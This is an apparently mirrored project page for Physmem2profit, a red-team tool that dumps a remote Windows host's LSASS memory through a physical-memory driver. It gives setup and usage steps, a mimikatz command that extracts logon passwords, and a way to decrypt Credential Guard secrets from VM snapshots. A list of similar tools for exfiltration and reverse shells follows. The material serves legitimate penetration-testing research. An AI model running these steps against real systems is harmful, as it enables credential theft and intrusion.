GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → FSecureLABS → Physmem2profit

FSecureLABS / Physmem2profit

Licence: apache-2.0
Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely

Labels

securitywindowspentestingred-team

Projects that are alternatives of or similar to Physmem2profit

Sessiongopher
SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.
Stars: ✭ 833 (+241.39%)
Mutual labels:  pentesting, red-team
Gitjacker
🔪 Leak git repositories from misconfigured websites
Stars: ✭ 1,249 (+411.89%)
Mutual labels:  pentesting, red-team
Sleight
Empire HTTP(S) C2 redirector setup script
Stars: ✭ 44 (-81.97%)
Mutual labels:  pentesting, red-team
Platypus
🔨 A modern multiple reverse shell sessions manager wrote in go
Stars: ✭ 559 (+129.1%)
Mutual labels:  pentesting, red-team
Aggressor scripts
A collection of useful scripts for Cobalt Strike
Stars: ✭ 126 (-48.36%)
Mutual labels:  pentesting, red-team
Autordpwn
The Shadow Attack Framework
Stars: ✭ 688 (+181.97%)
Mutual labels:  pentesting, red-team
Netmap.js
Fast browser-based network discovery module
Stars: ✭ 70 (-71.31%)
Mutual labels:  pentesting, red-team
Packetwhisper
PacketWhisper: Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server.
Stars: ✭ 405 (+65.98%)
Mutual labels:  pentesting, red-team
Bulwark
An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports.
Stars: ✭ 113 (-53.69%)
Mutual labels:  pentesting, red-team
Go Deliver
Go-deliver is a payload delivery tool coded in Go.
Stars: ✭ 103 (-57.79%)
Mutual labels:  pentesting, red-team
Bigbountyrecon
BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation.
Stars: ✭ 541 (+121.72%)
Mutual labels:  pentesting, red-team
Hack Tools
The all-in-one Red Team extension for Web Pentester 🛠
Stars: ✭ 2,750 (+1027.05%)
Mutual labels:  pentesting, red-team
Red Teaming Toolkit
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Stars: ✭ 5,615 (+2201.23%)
Mutual labels:  pentesting, red-team
Dumpsterfire
"Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue- & Red Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
Stars: ✭ 775 (+217.62%)
Mutual labels:  pentesting, red-team
Dref
DNS Rebinding Exploitation Framework
Stars: ✭ 423 (+73.36%)
Mutual labels:  pentesting, red-team
Cloakify
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection
Stars: ✭ 1,136 (+365.57%)
Mutual labels:  pentesting, red-team
Aiodnsbrute
Python 3.5+ DNS asynchronous brute force utility
Stars: ✭ 370 (+51.64%)
Mutual labels:  pentesting, red-team
Infosec reference
An Information Security Reference That Doesn't Suck; https://rmusser.net/git/admin-2/Infosec_Reference for non-MS Git hosted version.
Stars: ✭ 4,162 (+1605.74%)
Mutual labels:  pentesting, red-team
Thecollective
The Collective. A repo for a collection of red-team projects found mostly on Github.
Stars: ✭ 85 (-65.16%)
Mutual labels:  pentesting, red-team
Airmaster
Use ExpiredDomains.net and BlueCoat to find useful domains for red team.
Stars: ✭ 150 (-38.52%)
Mutual labels:  pentesting, red-team
View All Similar Projects ➔

Physmem2profit

Physmem2profit can be used to create a minidump of a target host's LSASS process by analysing physical memory remotely. The intention of this research is to propose an alternative approach to credential theft and create a modular framework that can be extended to support other drivers that can access physical memory. Physmem2profit generates a minidump (.dmp) of LSASS that can be further analyzed with Mimikatz. The tool does not require Cobalt Strike but should work fine over beacon with a SOCKS proxy.

The idea is illustrated below:

Overview of Physmem2profit

The tool has two components:

  1. The C# server component, physmem2profit.exe, executed on the target host
    • Loads the Winpmem driver and acts as a server, which exposes the physical RAM of the target host through a TCP port
  2. The client, physmem2profit Python module, executed on the attacking machine
    • When executed with --mode mount, connects to the target machine and mounts the physical RAM of the target as a raw file with the help of FUSE
    • When executed with --mode dump, calls various Rekall plugins to analyze the memory image and to generate a minidump of the LSASS process.
    • When executed with --mode all, performs both of the above actions. Connection with server will be closed when dump is complete.

Installation Instructions

  1. Clone the Physmem2profit Git repository: git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git
  2. For the server running on the target computer:
    1. Build physmem2profit/server/Physmem2profit.sln with Visual Studio
  3. For the client running on the attacking machine:
    1. bash physmem2profit/client/install.sh

Usage

  1. Run physmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] on the target as admin.
    • You can download the signed Winpmem driver here. This driver needs to be present on the target host.
  2. Run source physmem2profit/client/.env/bin/activate on the attacking machine. This command will activate the virtualenv created by install.sh.
  3. Run cd physmem2profit/client and python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER ] [--instal DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] on the attacking machine
    • physmem2profit.exe needs to be running on the target machine before you run this command.
    • This will write the LSASS minidump to output/[label]-[date]-lsass.dmp on the attacking machine.
  4. Copy the minidump to a Windows system and run mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"

Credential Guard

Decrypting credentials protected by Credential Guard requires gaining access to the encryption key that is stored in the Secure World. For testing purposes, Physmem2profit supports retrieving data from the Secure World from VMware Fusion/Workstation snapshots (.vmem files). This allows credentials protected by Credential Guard to be decrypted with the help of Mimikatz.

Setting up a virtual machine for testing

  1. Create a Windows 10 virtual machine with VMware Fusion/Workstation. Join the virtual machine to a domain (Credential Guard does not protect local accounts)
  2. In the Advanced settings, Enable VBS (Virtualization Based Security)
  3. Deploy Credential Guard. An easy option is to use the Device Guard and Credential Guard hardware readiness tool
  4. Reboot
  5. Run msinfo32 to ensure Virtualization-based security Services Running says Credential Guard

Testing

  1. Log in to the virtual machine (with a domain account)
  2. Take a snapshot
  3. Run Physmem2profit against the .vmem file: python3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
    • This will write the LSASS minidump to output/[label]-[date]-lsass.dmp. The minidump contains a special stream that holds the data from the Secure World, allowing Mimikatz to locate the encryption key.
    • The Secure World data is also stored to output/[label]-[date]-secure-world.raw.
    • If Rekall has problems parsing the .vmem file, Physmem2profit will recommend you to copy the .vmsn file and rename it to .vmss
  4. Copy the minidump to a Windows system and run mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"

Future work

The support for bypassing Credential Guard by exploiting the S3 Resume firmware vulnerability, demonstated in our Disobey talk, is coming soon :).

More Information

Rethinking Credential Theft | a blog post explaining why this approach to credential theft was chosen.

Physmem2profit is developed by @b3arr0 and @TimoHirvonen.

Kudos for contributing:

  • Janusz Szmigielski for refactoring the code for the first release
  • Pawel Kurowski for refactoring the code for the first release
  • Grzegorz Rychlik for refactoring the code for the first release
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].